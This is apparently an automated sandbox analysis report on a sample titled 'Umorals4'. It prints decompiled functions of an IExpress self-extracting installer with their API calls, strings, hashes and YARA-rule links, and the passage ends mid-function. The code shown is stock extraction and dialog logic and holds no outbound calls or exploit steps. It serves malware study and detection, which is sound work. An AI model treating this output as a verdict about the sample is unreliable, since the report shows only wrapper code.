GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F375DE
GetCurrentProcessId.KERNEL32 ref: 00F375ED
GetCurrentThreadId.KERNEL32 ref: 00F375F6
GetTickCount.KERNEL32 ref: 00F375FF
QueryPerformanceCounter.KERNEL32(?), ref: 00F37614

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 64a0698bfdd884865503d3eac012c52ce86e105f9fd793ebbbca249e40c16d5b
Instruction ID: 1608a07d18c080b984a143d6c9299a38bb56440f3725d4dcfbf8edc92e0606f4
Opcode Fuzzy Hash: 64a0698bfdd884865503d3eac012c52ce86e105f9fd793ebbbca249e40c16d5b
Instruction Fuzzy Hash: C5115BB1D04208EBCB14EBA9DA496AEB7F5FF08334F55446AE506E7210EB349A04EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F36C35, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F36C35(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00f36c3c
0x00f36c45
0x00f36c5e

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F36D7C,00F310D8), ref: 00F36C3C
UnhandledExceptionFilter.KERNEL32(00F36D7C,?,00F36D7C,00F310D8), ref: 00F36C45
GetCurrentProcess.KERNEL32(C0000409,?,00F36D7C,00F310D8), ref: 00F36C50
TerminateProcess.KERNEL32(00000000,?,00F36D7C,00F310D8), ref: 00F36C57

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 0ef11d8cc318a8a53dc2399db507bdadda3a5cff84661302ff43c0b130abe5ec
Instruction ID: cf2080b0d827672f6cb25204c6c7c7a5cdcf8504be3b47a4e0ec668f38e8715c
Opcode Fuzzy Hash: 0ef11d8cc318a8a53dc2399db507bdadda3a5cff84661302ff43c0b130abe5ec
Instruction Fuzzy Hash: 81D0C93200450CABD7003BF2EC0CA4D3E2AEB48222F445000F79982022CB734441AF52

Uniqueness

Uniqueness Score: -1.00%

Function 00F32B38, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F32B38(struct HINSTANCE__* __ecx, void* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xf39164 = __ecx;
				memset(0xf39180, 0, 0x8fc);
				memset(0xf38940, 0, 0x32c);
				memset(0xf39060, 0, 0x104);
				 *0xf3942c = 1;
				_t20 = E00F34538("TITLE", 0xf39194, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xf385cc = _t27;
					SetEvent(_t27);
					_t64 = 0xf39a74;
					if(E00F34538("EXTRACTOPT", 0xf39a74, 4) != 0) {
						if(( *0xf39a74 & 0x000000c0) == 0) {
							L12:
							 *0xf39a84 =  *0xf39a84 & _t65;
							if(E00F35B88(_t48, _t48, _t65, _t66) != 0) {
								if( *0xf3895a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xf381f8 != 0) {
										__imp__#17();
									}
									if( *0xf38944 == 0) {
										_t57 = _t65;
										if(E00F33587(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xf39a80; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xf39a74 & 0x00000100) == 0 || ( *0xf38958 & 0x00000001) != 0 || E00F316B6(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00F363E1(_t57, 0x7d6, _t34, E00F31800, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00F321E7(0xf3895a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00F34327(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00F34538("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xf385c8 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xf39a74 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00F34327(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00F34327(0, 0x54b, "Umorals4", 0, 0x10, 0);
										L11:
										CloseHandle( *0xf385c8);
										 *0xf39a88 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xf39a88 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00F36C20(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00f32b43
0x00f32b4a
0x00f32b55
0x00f32b57
0x00f32b5f
0x00f32b61
0x00f32b67
0x00f32b77
0x00f32b87
0x00f32b9c
0x00f32ba3
0x00f32baa
0x00f32d81
0x00000000
0x00f32bbb
0x00f32bc2
0x00f32bc9
0x00f32bce
0x00f32bd6
0x00f32be7
0x00f32c12
0x00f32cad
0x00f32cad
0x00f32cbc
0x00f32ccf
0x00f32ce8
0x00f32cf0
0x00f32cfa
0x00f32cfa
0x00f32d03
0x00f32d05
0x00f32d05
0x00f32d12
0x00f32d19
0x00f32d22
0x00000000
0x00f32d24
0x00f32d24
0x00f32d2c
0x00f32d30
0x00f32d48
0x00000000
0x00f32d5c
0x00f32d6c
0x00f32d7b
0x00000000
0x00000000
0x00000000
0x00000000
0x00f32d7b
0x00f32d7d
0x00f32d7d
0x00f32d7d
0x00f32d7d
0x00f32d30
0x00f32d14
0x00f32d16
0x00f32d16
0x00f32cd1
0x00f32cd6
0x00000000
0x00f32cd6
0x00f32cbe
0x00f32cbe
0x00f32d86
0x00f32d8f
0x00000000
0x00f32d8f
0x00f32c18
0x00f32c1d
0x00f32c2f
0x00000000
0x00f32c31
0x00f32c3c
0x00f32c42
0x00f32c49
0x00000000
0x00f32c58
0x00f32c61
0x00f32c83
0x00f32c90
0x00000000
0x00000000
0x00000000
0x00000000
0x00f32c63
0x00f32c6c
0x00f32c71
0x00f32c92
0x00f32c98
0x00f32c9e
0x00000000
0x00f32c9e
0x00f32c61
0x00f32c49
0x00f32c2f
0x00f32be9
0x00f32be9
0x00f32beb
0x00f32bf7
0x00f32bfc
0x00f32d94
0x00f32d94
0x00f32d94
0x00f32be7
0x00f32da6

APIs

memset.MSVCRT ref: 00F32B67
memset.MSVCRT ref: 00F32B77
memset.MSVCRT ref: 00F32B87

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32BC2
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32BCE

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34570
Part of subcall function 00F34538: LoadResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34579
Part of subcall function 00F34538: LockResource.KERNEL32(00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34580
Part of subcall function 00F34538: FreeResource.KERNEL32(00000000,?,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F3459B

CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32C3C
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32C4B
CloseHandle.KERNEL32(Umorals4,00000000,00000020,00000004,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F32C98

Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9

Strings

TITLE, xrefs: 00F32B97
INSTANCECHECK, xrefs: 00F32C23
EXTRACTOPT, xrefs: 00F32BDB
Umorals4, xrefs: 00F32B92, 00F32C67, 00F32C7E
VERCHECK, xrefs: 00F32CE2

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofString
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$Umorals4$VERCHECK
API String ID: 816842171-3722801934
Opcode ID: e5768a5013a018e48bd9197f33fabf718d165f1660e894ef7e0d82d30b23d6fc
Instruction ID: 9af7ae33a68eac69a9023f1779be77ae77b95c55cc2a37135b45882acb27b1d6
Opcode Fuzzy Hash: e5768a5013a018e48bd9197f33fabf718d165f1660e894ef7e0d82d30b23d6fc
Instruction Fuzzy Hash: 48512C70B44305ABEBA4AB359C4AB7F369AEB41771F104425F982D61D1DBFCC841F622

Uniqueness

Uniqueness Score: -1.00%

Function 00F330C0, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 171
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00F330C0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t5;
				void* _t9;
				int _t19;
				int _t20;
				int _t22;
				long _t23;
				int _t25;
				int _t26;
				void* _t28;
				int _t29;
				int _t30;
				int _t33;
				int _t34;
				int _t35;
				int _t39;
				void* _t42;
				void* _t53;
				void* _t57;
				struct HWND__* _t58;

				_t58 = _a4;
				_t5 = _a8 - 0x10;
				if(_t5 == 0) {
					_push(0);
					L32:
					EndDialog(_t58, ??);
					L33:
					__eflags = 1;
					return 1;
				}
				_t9 = _t5 - 0x100;
				if(_t9 == 0) {
					E00F34239(_t58, GetDesktopWindow());
					SetWindowTextA(_t58, "Umorals4");
					SendDlgItemMessageA(_t58, 0x835, 0xc5, 0x103, 0);
					_t39 = 1;
					__eflags =  *0xf39a80 - _t39; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t58, 0x836), 0);
					}
					L30:
					return _t39;
				}
				if(_t9 == 1) {
					_t19 = _a12 - 1;
					__eflags = _t19;
					if(_t19 == 0) {
						_t20 = GetDlgItemTextA(_t58, 0x835, 0xf39224, 0x104);
						__eflags = _t20;
						if(_t20 == 0) {
							L27:
							_t53 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L20:
							E00F34327(_t58, _t53);
							goto L33;
						}
						_t22 = E00F33086(0xf39224);
						__eflags = _t22;
						if(_t22 == 0) {
							goto L27;
						}
						_t23 = GetFileAttributesA(0xf39224);
						__eflags = _t23 - 0xffffffff;
						if(_t23 != 0xffffffff) {
							L21:
							E00F364E7(0xf39224, 0x104, 0xf31111);
							_t25 = E00F3578F(0xf39224);
							__eflags = _t25;
							if(_t25 != 0) {
								_t39 = 1;
								__eflags =  *0xf39224 - 0x5c;
								if( *0xf39224 != 0x5c) {
									L25:
									_t26 = E00F35849(0xf39224, _t39, _t58, _t39);
									__eflags = _t26;
									if(_t26 == 0) {
										goto L30;
									}
									L26:
									EndDialog(_t58, _t39);
									goto L30;
								}
								__eflags =  *0xf39225 - 0x5c;
								if( *0xf39225 == 0x5c) {
									goto L26;
								}
								goto L25;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							_t53 = 0x4be;
							goto L20;
						}
						_t28 = E00F34327(_t58, 0x54a, 0xf39224, 0, 0x20, 4);
						__eflags = _t28 - 6;
						if(_t28 != 6) {
							goto L33;
						}
						_t29 = CreateDirectoryA(0xf39224, 0);
						__eflags = _t29;
						if(_t29 != 0) {
							goto L21;
						}
						_push(0);
						_push(0x10);
						_push(0);
						_push(0xf39224);
						_t53 = 0x4cb;
						goto L20;
					}
					_t30 = _t19 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						EndDialog(_t58, 0);
						 *0xf39a88 = 0x800704c7;
						goto L33;
					}
					__eflags = _t30 != 0x834;
					if(_t30 != 0x834) {
						goto L33;
					}
					_t33 = LoadStringA( *0xf39164, 0x3e8, 0xf385d8, 0x200);
					__eflags = _t33;
					if(_t33 != 0) {
						_t34 = E00F34088(_t58, _t42, _t42);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L33;
						}
						_t35 = SetDlgItemTextA(_t58, 0x835, 0xf387e0);
						__eflags = _t35;
						if(_t35 != 0) {
							goto L33;
						}
						_t57 = 0x4c0;
						L9:
						E00F34327(_t58, _t57, 0, 0, 0x10, 0);
						_push(0);
						goto L32;
					}
					_t57 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x00f330cb
0x00f330ce
0x00f330d1
0x00f332bc
0x00f332be
0x00f332bf
0x00f332c5
0x00f332c7
0x00000000
0x00f332c7
0x00f330d7
0x00f330dc
0x00f3326e
0x00f33279
0x00f33292
0x00f3329a
0x00f3329b
0x00f332a2
0x00f332b2
0x00f332b2
0x00f332b8
0x00000000
0x00f332b8
0x00f330e3
0x00f330ef
0x00f330ef
0x00f330f0
0x00f33196
0x00f3319c
0x00f3319e
0x00f33256
0x00f33258
0x00f3325d
0x00f3325e
0x00f33260
0x00f33261
0x00f331f2
0x00f331f4
0x00000000
0x00f331f4
0x00f331a6
0x00f331ab
0x00f331ad
0x00000000
0x00000000
0x00f331b4
0x00f331bc
0x00f331bf
0x00f331fe
0x00f3320a
0x00f33211
0x00f33216
0x00f33218
0x00f33228
0x00f33229
0x00f33230
0x00f3323b
0x00f33243
0x00f33248
0x00f3324a
0x00000000
0x00000000
0x00f3324c
0x00f3324e
0x00000000
0x00f3324e
0x00f33232
0x00f33239
0x00000000
0x00000000
0x00000000
0x00f33239
0x00f3321a
0x00f3321b
0x00f3321d
0x00f3321e
0x00f3321f
0x00000000
0x00f3321f
0x00f331ce
0x00f331d3
0x00f331d6
0x00000000
0x00000000
0x00f331de
0x00f331e4
0x00f331e6
0x00000000
0x00000000
0x00f331e8
0x00f331e9
0x00f331eb
0x00f331ec
0x00f331ed
0x00000000
0x00f331ed
0x00f330f6
0x00f330f6
0x00f330f7
0x00f33170
0x00f33176
0x00000000
0x00f33176
0x00f330f9
0x00f330fe
0x00000000
0x00000000
0x00f33119
0x00f3311f
0x00f33121
0x00f33140
0x00f33145
0x00f33147
0x00000000
0x00000000
0x00f33158
0x00f3315e
0x00f33160
0x00000000
0x00000000
0x00f33166
0x00f33128
0x00f33131
0x00f33136
0x00000000
0x00f33136
0x00f33123
0x00000000
0x00f33123
0x00000000

APIs

LoadStringA.USER32 ref: 00F33119
GetDesktopWindow.USER32 ref: 00F33264
SetWindowTextA.USER32(?,Umorals4), ref: 00F33279
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F33292
GetDlgItem.USER32 ref: 00F332AB
EnableWindow.USER32(00000000), ref: 00F332B2
EndDialog.USER32(?,00000000), ref: 00F332BF

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F3318A, 00F3318F, 00F331B3, 00F331C6, 00F331DD, 00F331EC, 00F3323E
Umorals4, xrefs: 00F33273

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Umorals4
API String ID: 2418873061-2569978597
Opcode ID: bd80dee2613eed7e6408991ec4492199ca3cb1cbd76ac51966ae489ebec1ffa6
Instruction ID: b45b618f217ec374bfd695206135df987983b51bb113483bcc28a6ea0736120d
Opcode Fuzzy Hash: bd80dee2613eed7e6408991ec4492199ca3cb1cbd76ac51966ae489ebec1ffa6
Instruction Fuzzy Hash: 13410670B442147BE720AB365C8DF7B395EEB85B71F104124FA46E61D0DAA8DA01F2A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F33380, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 122
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00F33380(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t26;
				void* _t28;
				struct HWND__* _t40;
				void* _t41;
				void* _t48;
				struct HWND__* _t50;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					_t48 = 1;
					__eflags = 1;
					L21:
					_push(0);
					 *0xf39218 = _t48;
					L22:
					EndDialog(_a4, ??);
					L23:
					return _t48;
				}
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					_t48 = 1;
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L23;
					}
					goto L21;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t50 = _a4;
					 *0xf385c0 = _t50;
					E00F34239(_t50, GetDesktopWindow());
					__eflags =  *0xf381f8; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t50, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t50, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t50, "Umorals4");
					_t17 = CreateThread(0, 0, E00F34E80, 0, 0, 0xf385d0);
					 *0xf387d8 = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						L17:
						return 1;
					} else {
						E00F34327(_t50, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t50);
						L16:
						EndDialog();
						goto L17;
					}
				}
				_t26 = _t13 - 1;
				if(_t26 == 0) {
					_t48 = 1;
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L23;
					}
					ResetEvent( *0xf385cc);
					_t40 =  *0xf385c0; // 0x0
					_t28 = E00F34327(_t40, 0x4b2, 0xf31111, 0, 0x20, 4);
					__eflags = _t28 - 6;
					if(_t28 == 6) {
						L11:
						 *0xf39218 = _t48;
						SetEvent( *0xf385cc);
						_t41 =  *0xf387d8; // 0x0
						E00F33514(_t41);
						_push(0);
						goto L22;
					}
					__eflags = _t28 - 1;
					if(_t28 == 1) {
						goto L11;
					}
					SetEvent( *0xf385cc);
					goto L23;
				}
				if(_t26 == 0xe90) {
					TerminateThread( *0xf387d8, 0);
					_push(_a12);
					_push(_a4);
					goto L16;
				}
				return 0;
			}

0x00f3338a
0x00f3338d
0x00f334f5
0x00f334f5
0x00f334f6
0x00f334f6
0x00f334f8
0x00f334fe
0x00f33501
0x00f33507
0x00000000
0x00f33507
0x00f33393
0x00f33398
0x00f334ea
0x00f334eb
0x00f334ef
0x00000000
0x00000000
0x00000000
0x00f334f1
0x00f3339e
0x00f333a1
0x00f33443
0x00f33446
0x00f33456
0x00f3345d
0x00f33463
0x00f3347f
0x00f3349a
0x00f334a0
0x00f334a7
0x00f334bb
0x00f334c1
0x00f334c6
0x00f334c8
0x00f334e3
0x00000000
0x00f334ca
0x00f334d6
0x00f334db
0x00f334dc
0x00f334dd
0x00f334dd
0x00000000
0x00f334dd
0x00f334c8
0x00f333a7
0x00f333a8
0x00f333d3
0x00f333d4
0x00f333d8
0x00000000
0x00000000
0x00f333e4
0x00f333ea
0x00f33401
0x00f33406
0x00f33409
0x00f33420
0x00f33426
0x00f3342c
0x00f33432
0x00f33438
0x00f3343d
0x00000000
0x00f3343d
0x00f3340b
0x00f3340d
0x00000000
0x00000000
0x00f33415
0x00000000
0x00f33415
0x00f333af
0x00f333c0
0x00f333c6
0x00f333c9
0x00000000
0x00f333c9
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00F333C0
ResetEvent.KERNEL32 ref: 00F333E4
SetEvent.KERNEL32(00F31111,00000000,00000020,00000004), ref: 00F33415
GetDesktopWindow.USER32 ref: 00F3344C
GetDlgItem.USER32 ref: 00F33478
SendMessageA.USER32(00000000), ref: 00F3347F
GetDlgItem.USER32 ref: 00F33493
SendMessageA.USER32(00000000), ref: 00F3349A
SetWindowTextA.USER32(?,Umorals4), ref: 00F334A7
CreateThread.KERNEL32(00000000,00000000,Function_00004E80,00000000,00000000,00F385D0), ref: 00F334BB
EndDialog.USER32(?,00000000), ref: 00F334DD
EndDialog.USER32(?,00000000), ref: 00F33501

Strings

Umorals4, xrefs: 00F334A1

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: Umorals4
API String ID: 2406144884-264535404
Opcode ID: 8f43f10f68149ff27d537f476a9cb86dc4a012dc48ba2865eed5e2f216b60618
Instruction ID: 6bb0d199cb01e18c2f11fc4783e0cc4b9b5d2e81037f4a5b52e39d6fced702c9
Opcode Fuzzy Hash: 8f43f10f68149ff27d537f476a9cb86dc4a012dc48ba2865eed5e2f216b60618
Instruction Fuzzy Hash: ED310A32600359BBC7629F25EC0CE2B3E7AE785B71F144114FA42911B0CB799A02FFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F34088, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00F34088(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00F34327(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xf39060; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xf387e0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xf385d8;
					_v36 = 1;
					_v32 = E00F34060;
					_v28 = 0xf39060;
					 *0xf3a290( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xf3a290(_t32, 0xf39060);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xf39060 != 0) {
							E00F31485(0xf387e0, 0x104, 0xf39060);
						}
						 *0xf3a290(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xf387e0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xf39060);
					_t61 = 0xf39060;
					_t4 =  &(_t61[1]); // 0xf39061
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xf39060; // 0x1e720c1
					_t44 = CharPrevA(0xf39060, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xf39060, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00f34098
0x00f340a0
0x00f340a4
0x00f34216
0x00f3421b
0x00f34224
0x00000000
0x00f34229
0x00f340b0
0x00f340b6
0x00f340bb
0x00f34208
0x00f34209
0x00f3420f
0x00000000
0x00f3420f
0x00f340c7
0x00f340cd
0x00f340d2
0x00000000
0x00000000
0x00f340de
0x00f340e4
0x00f340e9
0x00000000
0x00000000
0x00f340f1
0x00f340f7
0x00f3414a
0x00f3414d
0x00f34153
0x00f34158
0x00f3415b
0x00f34164
0x00f3416b
0x00f34172
0x00f34179
0x00f34180
0x00f34186
0x00f3418a
0x00f34191
0x00f34191
0x00f34193
0x00f34198
0x00f341a7
0x00f341ad
0x00f341b1
0x00f341b8
0x00f341b8
0x00f341c1
0x00f341d2
0x00f341d2
0x00f341e1
0x00f341e7
0x00f341eb
0x00f341f2
0x00f341f2
0x00f341eb
0x00f341f5
0x00f341fd
0x00000000
0x00f340f9
0x00f34103
0x00f34109
0x00f3410e
0x00f3410e
0x00f34111
0x00f34111
0x00f34113
0x00f34114
0x00f3411a
0x00f34126
0x00f3412c
0x00f34132
0x00f34148
0x00f34148
0x00000000
0x00f34132

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?), ref: 00F3409A
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F340B0
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F340C7
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F340DE
GetTempPathA.KERNEL32(00000104,00F39060), ref: 00F34103
CharPrevA.USER32(00F39060,01E720C1), ref: 00F34126
CharPrevA.USER32(00F39060,00000000), ref: 00F3413A
FreeLibrary.KERNEL32(00000000), ref: 00F341F5
FreeLibrary.KERNEL32(00000000), ref: 00F34209

Strings

SHELL32.DLL, xrefs: 00F34093
SHBrowseForFolder, xrefs: 00F340AA
SHGetPathFromIDList, xrefs: 00F340D8

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 7deda5d761969f5dd9358a9727146790fc1ba16a76a5b6261965b8b86df9a1cf
Instruction ID: 2e7b152b8b8ba10804028c7d841c6bb3a52ef2b44d36f0ec7027c1236cab758c
Opcode Fuzzy Hash: 7deda5d761969f5dd9358a9727146790fc1ba16a76a5b6261965b8b86df9a1cf
Instruction Fuzzy Hash: 4141E6B4E44308AFD716AF75DC94A6E7B7AEB45370F040058E941A3251CBB9EC41FB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F34327, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 174
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00F34327(struct HWND__* __ecx, int __edx, void* _a4, long _a8, int _a12, void* _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				long _v580;
				long _v584;
				struct HWND__* _v588;
				void* __ebx;
				void* __edi;
				void* __esi;
